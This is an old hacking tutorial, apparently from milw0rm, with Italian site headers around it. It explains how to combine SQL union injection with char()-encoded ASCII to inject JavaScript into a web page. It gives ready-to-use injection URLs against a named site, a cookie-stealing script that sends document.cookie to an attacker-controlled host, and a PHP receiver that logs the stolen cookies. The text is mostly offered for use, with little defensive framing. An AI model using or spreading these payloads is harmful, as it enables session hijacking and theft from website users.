Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
[------------------------------------------------------------------------]
[+] Summary
[1] Presentation
[2] Explanation
[3] Demonstration
[4] Bibliography
[------------------------------------------------------------------------]
[1] --[Presentation]--
XFS is a SQL deviation who lets return javascript code by through of the
function char().
This function convert an ASCII code to char, this why we'll use it to execute
javascript code.
The XFS can give you a restricted XSS possibility and obviously the SQL
vulnerabilty.
In the next parties you will see the conditions for do it, how it work and
demonstration.
[2] --[Explanation]--
To use it, you need to convert your string in ASCII (Online Converter :
http://www.easycalculation.com/ascii-hex.php).
Char() will read the ASCII code and return it, so if you insert the ASCII
javascript code, char() will return you the
javascript code and it will be executed BUT when you encode your javascript code,
this code mustn't have any space, so the XSS is restricted
but you can grab, alert and a lot of other XSS thing.
Example :
If you want convert your javascript code to ASCII, for work, the javascript code
mustn't to be like it :
When the code will be convert in ASCII, you will get a thing like it :
46 65 42 12 85 68 ...
[3] --[Demonstration]--
Vuln website :
- http://landfill.elvinbts.org/show_activity.php?
id=null+union+select+1,2,3,4,5,char(ASCII_CODE),7,8--
Alert :
################################
#
#- String : <SCRIPT>alert('xss')</script>
#
#- ASCII : 60 83 67 82 73 80 84 62 97 108 101 114 116 40 39 120 115 115 39 #41 60
47 115 99 114 105 112 116 62
#
################################
Cookie Grabber :
################################
#
#- String : <SCRIPT>location.href='http://www.yoursite.com/cookie.php?
#cookie='+escape(document.cookie)</SCRIPT>
#
#- ASCII : 60 83 67 82 73 80 84 62 108 111 99 97 116 105 111 110 46 104 114 101 102
61 39 104 116 116 112 58 47 47 119 119 119 46 121 111 117 114 115 105 116 101 46 99
111 109 47 99 111 111 107 105 101 46 112 104 112 63 99 111 111 107 105 101 61 39 43
101 115 99 97 112 101 40 100 111 99 117 109 101 110 116 46 99 111 111 107 105 101
41 60 47 83 67 82 73 80 84 62
#
################################
################################
#
# <?php
#
#
$cookies = $_GET["cookie"];
#
# if($cookies)
# {
#
# $grab = fopen("grab.txt","a");
# fputs($grab, $cookies . "\r\n");
# fclose($grab);
#
# }
#
# ?>
#
################################
So before insert your ASCII in char(), you must replace (in the ASCII code) all
space by ",".
Example :
################################
# 45 52 86 23 54 ...
# To :
# 45,52,86,23,54 ...
################################
So lets go :
Alert :
http://landfill.elvinbts.org/show_activity.php?
id=null+union+select+1,2,3,4,5,char(60,83,67,82,73,80,84,62,97,108,101,114,116,40,3
9,120,115,115,39,41,60,47,115,99,114,105,112,116,62),7,8--
You can see a textbox is executed with the text : "XSS" => it's the XSS alert
[4] --[Bibliography]--
SQL tutorial :
[------------------------------------------------------------------------]
[Thanks to] : Moudi, J.consultant, Sheiry, Pr0h4ck3rz, Stacker, Shimik Root aka
Str0zen & Security-Shell Community
# milw0rm.com [2009-08-04]